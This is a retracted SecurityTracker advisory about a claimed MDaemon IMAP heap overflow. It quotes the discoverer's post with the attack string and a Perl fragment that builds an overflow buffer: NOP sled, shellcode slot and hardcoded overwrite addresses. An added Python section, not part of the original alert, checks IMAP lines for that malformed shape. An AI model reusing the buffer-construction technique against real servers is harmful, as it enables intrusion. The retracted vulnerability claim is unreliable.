
Category:  Application (E-mail Server)  >  MDaemon (Alt-N)
Vendors:  Alt-N Technologies
[Not a Vulnerability] MDaemon Heap Overflow in IMAP Service Lets Remote Authenticated Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016167
SecurityTracker URL:  http://securitytracker.com/id?1016167
CVE Reference:  GENERIC-MAP-NOMATCH
Updated:  Jun 7 2006
Original Entry Date:  May 28 2006
Impact:  Execution of arbitrary code via network, User access via network
Version(s): 9.0.1; possibly other versions
Description:  A vulnerability was reported in MDaemon. A remote authenticated user can execute arbitrary code on the target system. [Editor's note: The original report has been retracted. There is no vulnerability. This Alert will be deleted from our database shortly.]

A remote authenticated user can send specially crafted data to the IMAP service to trigger a buffer overflow and execute arbitrary code on the target system. The code will run with the privileges of the target service.

A demonstration exploit command is provided:

a001 "[99555 characters]\r\n

kcope discovered this vulnerability.

[Editor's note: kcope has retracted the vulnerability report. The original vulnerable behavior that was observed was introduced by the debugger used to monitor the process. Without the debugger, there is no vulnerability.]
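
The request shape in the demonstration command above (a tag followed directly by an opening double quote, about 99555 characters, and no closing quote before the CRLF) is malformed IMAP whether or not a server mishandles it. The Python below is an added example, not part of the original alert or of MDaemon, showing checks a proxy or log reviewer could apply to one command line; the 8192-octet limit, the function names and the sample lines are assumptions constructed for illustration.

```python
from __future__ import annotations

MAX_LINE = 8192  # assumed policy limit in octets; tune to the server's real limit

def quotes_balanced(line: bytes) -> bool:
    """True if every double-quoted string on the line is closed."""
    in_quote, i = False, 0
    while i < len(line):
        ch = line[i:i + 1]
        if in_quote and ch == b"\\":
            i += 2  # backslash escapes the next octet inside a quoted string
            continue
        if ch == b'"':
            in_quote = not in_quote
        i += 1
    return not in_quote

def inspect_imap_line(raw: bytes, max_len: int = MAX_LINE) -> list[str]:
    """Return findings for one client-to-server IMAP command line."""
    findings = []
    if len(raw) > max_len:
        findings.append("oversized-line")
    if not raw.endswith(b"\r\n"):
        findings.append("missing-crlf")
    body = raw.rstrip(b"\r\n")
    tag, _, rest = body.partition(b" ")
    if not tag or not rest:
        findings.append("no-command")
    elif rest.startswith(b'"'):
        findings.append("quoted-string-in-command-position")
    if not quotes_balanced(body):
        findings.append("unterminated-quoted-string")
    return findings

# Constructed sample lines (not captured traffic).
SAMPLES = [
    b'a001 LOGIN "alice" "s3cret"\r\n',         # well-formed
    b'a002 LOGIN "al\\"ice" "pw"\r\n',          # escaped quote, still well-formed
    b'a001 "' + b"Z" * 99555 + b"\r\n",         # shape quoted in the alert
    b'a003 "ZZZZ\r\n',                          # same shape, under the size limit
]

def triage(lines: list[bytes]) -> dict[int, list[str]]:
    """Map sample index -> findings, for lines with at least one finding."""
    return {i: f for i, line in enumerate(lines) if (f := inspect_imap_line(line))}

if __name__ == "__main__":
    for idx, found in triage(SAMPLES).items():
        print(idx, len(SAMPLES[idx]), found)
```

Lines that end in an IMAP literal marker such as {123} continue on the following lines and must be reassembled before these checks apply.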

Impact:  No impact.

[Editor's note: The original report has been retracted. There is no vulnerability. This Alert will be deleted from our database shortly.]

Solution:  [Editor's note: The original report has been retracted. There is no vulnerability. This Alert will be deleted from our database shortly.]
Vendor URL:  www.altn.com/
Cause:  Boundary error
Underlying OS:  Windows (Any)
Reported By:  kcope <kingcope@gmx.net>
Message History:   None.


 Source Message Contents

Date:  Sun, 28 May 2006 15:24:30 +0200
From:  kcope <kingcope@gmx.net>
Subject:  [Full-disclosure] *zeroday warez* MDAEMON LATEST VERSION PREAUTH

 
MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE*

zeroday discovered by kcope kingcope[at]gmx.net !!!
shouts to alex,wY!,bogus,revoguard,adizeone

Description
There's a remotely exploitable preauthentication hole in Alt-N MDaemon.
It is a Heap Overflow in the IMAP Daemon.
It can be triggered by sending the following attack string:
a001 "[X]\r\n
Look specifically at the " it is important :)
[X] consists of f.e. 99555 Z's to reach the 4 byte overwrite.
Now one can use the 4 byte overwrite in some PEB pointer overwrite to
open a remote shell. UnhandledExceptionFilter is also possible I think.
No exploit is delivered at this time, figure it out yourself (use the 
PEB Lock) :)

Sample code:
 $where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C
 #$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000
 $what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A
 
 $nops = "A" x 100;
 $a = $nops . $shellcode . ("Z" x 
(0x2006-length($shellcode)-length($nops))) . $what . $where . ("Z" x 
(0x184AC - 0x200A - 12));
 print $sock "a001 \"$a\r\n";
 close($sock);

Best Regards,
kcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 



Copyright 2006, SecurityGlobal.net LLC